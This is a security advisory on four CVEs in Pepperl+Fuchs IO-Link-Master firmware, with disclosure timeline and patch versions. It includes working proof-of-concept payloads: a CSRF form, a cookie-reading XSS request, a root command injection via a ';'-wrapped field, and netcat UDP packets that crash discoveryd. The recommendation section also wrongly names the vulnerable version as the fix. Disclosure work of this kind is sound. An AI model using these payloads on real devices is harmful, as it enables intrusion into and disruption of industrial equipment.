Multiple Vulnerabilities In Pepperl+Fuchs IO-Link-Master Series

Title

Multiple Vulnerabilities

Product

Pepperl+Fuchs IO-Link-Master Series

Vulnerable Version

System 1.36 / Application 1.5.28

Fixed Version

System 1.52 / Application 1.6.11

CVE Number

CVE-2020-12511, CVE-2020-12512, CVE-2020-12513, CVE-2020-12514

Impact

high

Found

04.23.2020

By

T. Weber (Office Vienna) | SEC Consult Vulnerability Lab

The IO-Link-Master device series which are developed by Pepperl+Fuchs AG are prone to different vulnerabilities. An authenticated command injection vulnerability is present in this device series. This vulnerability can also be exploited via Cross-Site Request Forgery attacks as there is no protection for that kind of attack. The NMS (Network Management System) daemon communicates via UDP and is prone to a Null Pointer Dereference. All findings were verified by emulating the device with the MEDUSA scalable firmware runtime.

Vendor Description

"Automation is our world. Perfect application solutions are our goal. In 1945, Walter Pepperl and Ludwig Fuchs founded a small radio workshop in  Mannheim, Germany, based on the principles of inventiveness, entrepreneurial foresight, and self-reliance. The experience they acquired was transformed into new ideas, and they continued to enjoy developing products for customers. The eventual result was the invention of the proximity switch. This innovation rep-resented the starting point of the company's success story. Today, Pepperl+Fuchs is known by customers around the world as a pioneer and an innovator in electrical explosion protection and sensor technology. Our main focus is always on your individual requirements: With a passion for automation and groundbreaking technology, we are committed to working in partnership with you now and in the future. We understand the demands of your markets, developing specific solutions, and integrating them into your processes."

Source: https://www.pepperl-fuchs.com/usa/en/25.htm

Business Recommendation

SEC Consult recommends to update the devices to the newest firmware packages (System 1.36 / Application 1.5.28), where the documented issues are fixed according to the vendor.

Vulnerability Overview / Description

1) Cross-Site Request Forgery (CSRF) (CVE-2020-12511)

The web interface that is used to set all configurations, is vulnerable to cross-site request forgery attacks. An attacker can change settings via this  way by luring the victim to a malicious website.

2) Authenticated Reflected POST Cross-Site Scripting (CVE-2020-12512)

An authenticated reflected cross-site scripting can be triggered by issuing a POST request to the "/Software" endpoint which is available on the web-service. An attacker can abuse these vulnerabilities to steal cookies from the attacked user in order to log on to the device. An attacker is also able to perform actions in the context of the attacked user.

3) Authenticated Blind Command Injection (CVE-2020-12513)

A command injection was identified in the web-interface. This vulnerability is present because of unfiltered user input that is appended to a string which gets executed with "exec()". Commands are executed as root user.

4) Null Pointer Dereference / DoS in "discoveryd" (CVE-2020-12514)

The discovery daemon ("discoveryd") is started during the bootup of the device. The program is used for the network management program "PortVision DX". It is designed with unsafe functions and is vulnerable to a DoS attack. This is triggered due to a null dereference in strlen. A debug mode is also available in  the program. This can be activated by starting the discovery daemon with "discoveryd -vv". All inputs are printed to the stdout during its execution with this argument. This is not done in the productive device but can lead to more severe attacks.

5) Outdated and Vulnerable Software Components

Outdated and vulnerable software components were found on the device during a quick examination.

One of the discovered vulnerabilities (CVE-2017-16544) was verified by using the MEDUSA scalable firmware runtime.

 

Proof Of Concept

1) Cross-Site Request Forgery (CSRF) (CVE-2020-12511)

The following PoC can be used to change the hostname of the device to "SEC-Consult":

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://$IP/configuration_tab/ajax_comb_table_save/network_config/network_config_schema" method="POST">
      <input type="hidden" name="form" value="Hostname&#61;SEC-Consult&amp;IPv4mode&#61;static&amp;IPv4address&#61;1&#46;1&#1;0&#1;1&amp;IPv4netmask&#61;255&#46;255&#46;255&#46;0&amp;IPv4gateway&#61;1&#46;1&#46;1&#1;2&amp;DNSmode&#61;manual&amp;IPv4DNS1&#61;&amp;IPv4DNS2&#61;&amp;IpAddrCnflctDetectEnbl&#61;enable&amp;NtpServer&#61;&amp;SyslogServer&#61;&amp;SyslogPort&#61;514&amp;SshServerEnable&#61;disable" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

 

2) Authenticated Reflected POST Cross-Site Scripting (CVE-2020-12512)

By sending the following request to the web-service, a reflected cross-site scripting vulnerability can be triggered:

POST /Software HTTP/1.1 
Host: $IP 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 42 
Connection: close 
Cookie: ui_language=en_US; PHPSESSID=r7jtaceerqeijqr4b2dl0us814 
Upgrade-Insecure-Requests: 1 
 
language=german'><script>alert(document.cookie)</script>

The server responds with the following content:

HTTP/1.1 200 OK 
X-Powered-By: PHP/5.6.15 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Pragma: no-cache 
Content-type: text/html; charset=UTF-8 
Content-Length: 11860 
Connection: close 
Date: Thu, 01 Jan 1970 00:59:46 GMT 
Server: lighttpd/1.4.41

[...]

<div class="page-content"> 
  <div class="page-header"> 
   <h1>Software <a href='/assets/WebHelp/german'><script>alert(document.cookie)</script>/advanced/software.htm' target='_blank'><img src='/assets/images/question_16.png' alt='Page-specific Help'></a></h1> 
    <a class="latest-version" href="#">Check for latest version</a> 
  </div>

[...]

PoC-Exploit code for the cross-site scripting vulnerability:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://$IP/Software" method="POST">
      <input type="hidden" name="language" value="german&apos;&gt;&lt;script&gt;alert&#40;document&#46;cookie&#41;&lt;&#47;script&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

 

3) Authenticated Blind Command Injection (CVE-2020-12513)

By entering a command in the field "code" under the tab "IO-Link Test Event Generation" on the endpoint "/Misc/Settings" that is surrounded by ";", it gets executed. The following POST request to the web-service demonstrates this with the command "ping 127.0.0.1":

POST /index.php/ajax/generate_iolink_event/ HTTP/1.1 
Host: $IP  
Accept: */* 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: $IP/Misc/Settings 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 
X-Requested-With: XMLHttpRequest 
Content-Length: 101 
Connection: close 
Cookie: ui_language=en_US; PHPSESSID=lh8d4g4e8fm9f1732j9g6bm3a0 
 
mode=single&type=message&instance=unknown&source=local&pdivalid=valid&code=0x0000%3Bping+127.0.0.1%3B

There is no response from the web-service which indicates to the attacker that the command was executed. As this was tested on an emulated device only, the commands were seen in the process list which proofed that it was executed as root:

-bash-4.4# ps
PID   USER     COMMAND
[...]
  216 root     /usr/sbin/restoremonitor
  272 root     /usr/sbin/snmpd -Lsd -Lf /dev/null -p /var/run/snmpd.pid
  333 root     /apps/bin/appmgr
  347 root     05discoverd
  349 root     11iolinkconfigd
  353 root     90netconfig-saved
  354 root     90netconfig-working
  385 root     lighttpd -f /apps/www/lighttpd.conf
  386 root     /usr/bin/php-cgi
  387 root     /usr/bin/php-cgi
  388 root     /usr/bin/php-cgi
  389 root     /usr/bin/php-cgi
  390 root     /usr/bin/php-cgi
  391 root     /usr/bin/php-cgi
  392 root     config waitcmd working network /apps/bin/updateLighttpdAuth
  395 root     /usr/bin/php-cgi
  397 root     -bash
  399 root     /usr/bin/php-cgi
  473 root     udhcpc -R -n -O search -p /var/run/udhcpc.eth0.pid -i eth0 -x ho
 2519 root     [kworker/u3:2]
 3173 root     sh -c injectEvent -m single -t message -i unknown -s local -v va
 3175 root     ping 127.0.0.1
 3509 root     50ethernetip
 3541 root     [10iolinkd]
 3544 root     ps

 

4) Null Pointer Dereference / DoS in "discoverd" (CVE-2020-12514)

Payload for triggering a segmentation fault (caused by a null pointer dereference):

$ echo -e "\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x00\x0c\x00\x10\x10" | nc -u $IP 4606

Program received signal SIGSEGV, Segmentation fault.
0xb6f5dfb4 in strlen () from /lib/libc.so.0
(gdb)

Payload for writing ASCII characters in debug mode ("discoveryd -vv"). Register R4 can be controlled via a byte (filled with value "\xab") also in normal mode ("discoveryd"):

$ echo -e "\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x01\x0c\x00\x10\xab\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63" | nc -u $IP 4606

Program received signal SIGSEGV, Segmentation fault.
0xb6f5dfb4 in strlen () from /lib/libc.so.0
(gdb) i r
r0             0x0                 0
r1             0x0                 0
r2             0xbefffb9b          3204447131
r3             0x0                 0
r4             0xab                171
r5             0x1da               474
r6             0xb6f8dbee          3069762542
r7             0x0                 0
r8             0x0                 0
r9             0x0                 0
r10            0xb6ffef74          3070226292
r11            0xbefff574          3204445556
r12            0xb6f5dfb0          3069566896
sp             0xbefff558          0xbefff558
lr             0xaf9c              44956
pc             0xb6f5dfb4          0xb6f5dfb4 <strlen+4>
cpsr           0xa0000010          -1610612720
fpscr          0x0                 0

 

More bytes than in this payload will lead to another program execution path in
debug mode ("discoveryd -vv").

$ echo -e "\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x01\x0c\x00\x10\xab\x63\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | nc -u $IP 4606

Other program paths, depending on the current memory, can be triggered with
this payload in debug mode due to printf:

$ echo -e "\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x01\x0c\x00\x10\xab\x63\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | nc -u $IP 4606

In normal mode, only a null pointer dereference is triggered which leads to a program crash.

5) Outdated and Vulnerable Software Components

  • PHP 5.6.15
  • lighttpd 1.4.41
  • OpenSSL 1.0.2j
  • Linux Kernel 2.6.30
  • BusyBox 1.26.2

The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on an emulated device:

A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the vulnerability.

# ls "pressing <TAB>"
test
]55;test.txt 
#

The vulnerabilities 1), 2), 3) and 4) were manually verified on an emulated device by using the MEDUSA scalable firmware runtime.

Vulnerable / Tested Versions

The IO-Link Master devices are sharing the same firmware base. The vulnerabilities were tested on an emulated firmware (system 1.36/ app EIP 1.5.28).

According to the vendor, all firmware versions below 1.5.48 are vulnerable:
IO-Link Master 4-EIP         / <=1.5.48
IO-Link Master 8-EIP         / <=1.5.48
IO-Link Master 8-EIP-L       / <=1.5.48
IO-Link Master DR-8-EIP      / <=1.5.48
IO-Link Master DR-8-EIP-P    / <=1.5.48
IO-Link Master DR-8-EIP-T    / <=1.5.48
IO-Link Master 4-PNIO        / <=1.5.48
IO-Link Master 8-PNIO        / <=1.5.48
IO-Link Master 8-PNIO-L      / <=1.5.48
IO-Link Master DR-8-PNIO     / <=1.5.48
IO-Link Master DR-8-PNIO-P   / <=1.5.48
IO-Link Master DR-8-PNIO-T   / <=1.5.48

Vendor Contact Timeline

2020-04-30 Contacting VDE CERT through info@cert.vde.com.
2020-07-29 Received confirmation from VDE CERT.
2020-07-31 Call with P+F regarding vulnerabilities from this and another advisory.
2020-09-29 Call with Pepperl+Fuchs and CERT@VDE regarding status.
2020-10-02 Received CVE IDs and preliminary advisory from VDE@CERT.
2020-11-11 Call with Pepperl+Fuchs regarding the patches. They should be available within the next two weeks according to P+F. Agreed with P+F and VDE CERT to release the security advisory next year.
2020-12-14 Received preliminary advisory from P+F. Set publication date to 2021-01-04.
2021-01-04 Received final advisory from P+F.
2021-01-13 Coordinated release of security advisory.

Solution

Update the firmware to Application 1.6.11 / System 1.52 to resolve the security issues.

According to Pepperl+Fuchs, the following steps are recommended to be taken:

"In order to prevent the exploitation of the reported vulnerabilities, we recommend that the affected units be updated with the following three firmware packages:

  •   U-Boot bootloader version 1.36 or newer
  •   System image version 1.52 or newer
  •   Application base version 1.6.11 or newer

Furthermore, it is always recommended to observe the following measures if the affected products are connected to public networks:

  1.  An external protective measure to be put in place. Traffic from untrusted networks to the device should be blocked by a firewall. Especially traffic targeting the administration webpage.
  2.  Device user accounts to be enabled with secure passwords. If non-trusted people/applications have access to the network that the device is connected to, then configuring passwords for all three User Accounts is recommended."

Pepperl+Fuchs advisory page: https://www.pepperl-fuchs.com/germany/de/29079.htm

Workaround

None

Advisory URL

https://sec-consult.com/vulnerability-lab/

 

EOF T. Weber / @2021

Contact

Interested to work with the experts of SEC Consult? Send us your application.
Want to improve your own cyber security with the experts of SEC Consult?